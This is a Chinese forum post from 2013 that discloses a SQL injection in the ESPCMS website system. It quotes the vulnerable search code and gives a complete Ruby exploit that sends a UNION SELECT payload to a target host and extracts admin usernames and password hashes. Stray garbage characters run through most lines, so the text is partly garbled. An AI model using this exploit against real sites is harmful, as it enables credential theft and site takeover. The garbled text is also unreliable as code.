0×0 漏洞概述0×1 漏洞细节. u& {- f2 c, _4 v! m s
0×2 PoC; I, V! A/ M% R8 Z6 E% p' J4 P. ^
; S* ^6 @( ~3 ^ E; U! P+ k# V
3 m* K2 M9 s+ ?6 @% X; Z$ H$ P
0 R; e6 W9 R$ H" z4 O; v0×0 漏洞概述
% U) ]# E3 ?+ F% U: B
* W& V' F. [ g" w! [易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。- n- A) ^7 W$ m5 R
其在处理传入的参数时考虑不严谨导致SQL注入发生
) I& ~. X$ {0 w+ i1 h6 J! P* V' `
+ J. Z) I n+ l& ~
# q7 G" ]0 |$ z. b0×1 漏洞细节! R; ]$ |, [0 J
/ L. ?; y8 m/ c; f
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
5 ]1 e r; Y& Y. V正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
+ S/ L. a$ }" U+ M6 `而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。: {5 N/ j, G& g0 M2 S b
3 `9 P% Y3 {- _" I3 `; O
在/interface/3gwap_search.php文件的in_result函数中:
. \- ~! W, B2 t9 Z( B3 C
( b8 w, _5 K4 i- `
% T) D4 [; R3 h" E! i6 t5 w& G$ ~0 E2 B+ x$ U( T7 C
function in_result() {
$ f3 r) c7 A$ `& @9 Y: N ... ... ... ... ... ... ... ... ...& O7 ~' `. j1 q ]9 G
$urlcode = $_SERVER[ 'QUERY_STRING '];
( y7 y4 w# c* ~6 y5 w% w9 R parse_str(html_entity_decode($urlcode), $output);2 U l7 w- o% D G
* W' L0 o1 Y9 P5 Y. { ... ... ... ... ... ... ... ... ...
0 z! O+ P: I8 t if (is_array($output['attr' ]) && count($output['attr']) > 0) {
" N" J3 a% X! J2 J' n _# m R9 S; h0 m7 v% _1 { T- I/ r
$db_table = db_prefix . 'model_att';
3 X5 H& s x; i: f* x+ f. P$ D1 X2 H! L1 w" {6 n [8 g o q. L
foreach ($output['attr' ] as $key => $value) {
' e8 ^% w0 U/ {/ R' S- h if ($value) {& v6 Y7 S6 _, j! E4 I6 }
# Z. {6 S: p1 w4 h2 v) K
$key = addslashes($key);3 n5 j( p0 ~ w6 E4 D# d& S2 r
$key = $this-> fun->inputcodetrim($key);8 t H: s( |- y. f1 L/ {) T
$db_att_where = " WHERE isclass=1 AND attrname='$key'";
, k, G4 l5 q$ q" b $countnum = $this->db_numrows($db_table, $db_att_where);
' c4 h9 ?- l/ t/ R' [+ h) u& ^" L if ($countnum > 0) {
5 o; K2 L) c* {7 S $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;$ ]7 |% ?3 J, k, Q6 B( | F0 ]
}& s9 i: x; o. A% U3 I/ \
}
$ K0 z* `" J/ |8 n% J, ] }
# A$ V1 g2 r. I& P$ ~. E4 O. F5 j2 k }% R4 Z% x+ E! r8 B: q( k% R( W
if (!empty ($keyword) && empty($keyname)) {
0 f/ I4 S4 K* f8 p/ B$ X; l. P $keyname = 'title';
( {. j$ K( B3 H K0 c6 w# g $db_where.= " AND a.title like '%$keyword%'" ;
( `( B* s% v& n8 Z' s# f } elseif (!empty ($keyword) && !empty($keyname)) {! ?, u" U" U8 ~/ e( c/ ^
$db_where.= " AND $keyname like '% $keyword%'";, A6 O3 @; Y3 w2 j! i3 Y
}- ?, l# i% H- E- D! S
$pagemax = 15;
% U8 ~/ h8 _0 j; `6 a6 ]8 [& A8 {
( U' c1 V. ^& s! ? {7 {* F $pagesylte = 1;
# a& P8 d7 |6 n. b
0 |3 T7 U) a9 m: b( e+ \4 L( c5 M if ($countnum > 0) {
7 A$ w% G0 P# b; K* P& \- ~6 Y F) _
$numpage = ceil($countnum / $pagemax);
" ?0 b* f9 k" y3 X! q" } } else {
4 ~! @* _+ G( D* ? $numpage = 1;
6 m5 ?6 y3 @, N; B) K' A5 _ }
" J8 x" i" B+ M $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
5 b9 x9 r: ] X6 Q% H $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
$ {) O' I$ _) o P9 q5 g& L$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
/ F# k0 i {) G$ J; ~ ... ... ... ... ... ... ... ... ...0 x, v& A2 a/ Y% I" v, e$ {
}
2 N4 n W! V8 |. z# p
# T% {% x" W; u- D7 I* o6 s, X& Z+ r: o4 M0 W1 u4 }
0×2 PoC( z; g }1 ^6 ~* ]
3 ^, j" J0 _" e7 I m4 |; Z$ O. h# ?) }3 N
9 s: }9 a+ T1 {8 A0 d
3 c; z7 }: L) I6 v G1 [: m
require "net/http"0 [1 M8 w' E4 |: ]
# d, h% n F7 ~% e- O
def request(method, url)) }9 F0 t: T4 K
if method.eql?("get")
% u) }" E, z- n; Y2 I/ a uri = URI.parse(url)
% N! i v5 Z% M& Q) T http = Net::HTTP.new(uri.host, uri.port)4 l) p% }2 `( \- E0 y1 Z* b
response = http.request(Net::HTTP::Get.new(uri.request_uri))
# P" i; E( X% b9 `% U return response
8 w2 X5 y6 S" L7 d* e1 l end$ n7 Z0 h+ H# u& r7 c: k
end* r: j1 ]3 R0 Z1 K" h5 K# k7 V
7 I" u$ |, [2 ?3 Q. Bdoc =<<HERE
9 }0 d, M$ M2 a' N-------------------------------------------------------
" z2 {: G4 q, q: T7 M1 J6 p( F* zEspcms Injection Exploit3 U! f6 R3 J7 S" k
Author:ztz$ X$ a3 x9 O% X. M4 z/ A- x
Blog:http://ztz.fuzzexp.org/1 Z' t# T1 Q$ ~$ A; ^: W+ R4 D; D
-------------------------------------------------------
8 H `9 Q$ z/ B; p5 N6 ]- K7 G# c- ~: j& I$ |0 D! e+ p
HERE' u% N4 p; ]8 Q, w1 N/ P- Q- T/ t
/ c. e2 r$ f0 r9 J9 m% E$ t, |usage =<<HERE! Q3 p8 Y: k: {1 J% n" k
Usage: ruby #{$0} host port path
% c$ E0 m- ]# l: I. Lexample: ruby #{$0} www.target.com 80 /
6 n, v0 V+ R+ N+ P5 P3 ^3 h+ R+ }HERE% H" g0 i+ {& z7 O" \/ p' Y
0 k; W( e% M) @, u3 a/ r+ m- j; v
puts doc; ~0 s( o I) ~ R9 w) |! m/ T/ q
if ARGV.length < 3
# v7 E9 P( a4 {( F. o+ w puts usage3 X. M- h; D& ^2 P, j
else* p0 U$ s, F2 f5 }$ J( |
$host = ARGV[0]. ]' E% K* a, c2 n
$port = ARGV[1]! @8 U! v' m) r! x* {
$path = ARGV[2]. x& e- X# J7 c5 W) U k
) {( k' }% H9 {6 M puts "send request...") R. }. o" s: b t! e4 G
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&# @- f+ p) g0 C- s3 ~0 E9 |
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
/ }8 J* l: P% |' |,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
3 ` L- v9 T. F7 E5 W+ L& s+ i,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
% V: [! z% d8 I, Y6 s response = request("get", url)+ b, Z2 C, W5 b1 }
result = response.body.scan(/\w+&\w{32}/)
: y5 ~( E) `2 { puts result
2 L4 ?( M. D) z. x7 h% \end
3 _3 h; v. ^$ ?+ M4 {9 t" z6 g5 n0 T' C
|
发表于 2013-7-27 18:31:52
收藏
支持
反对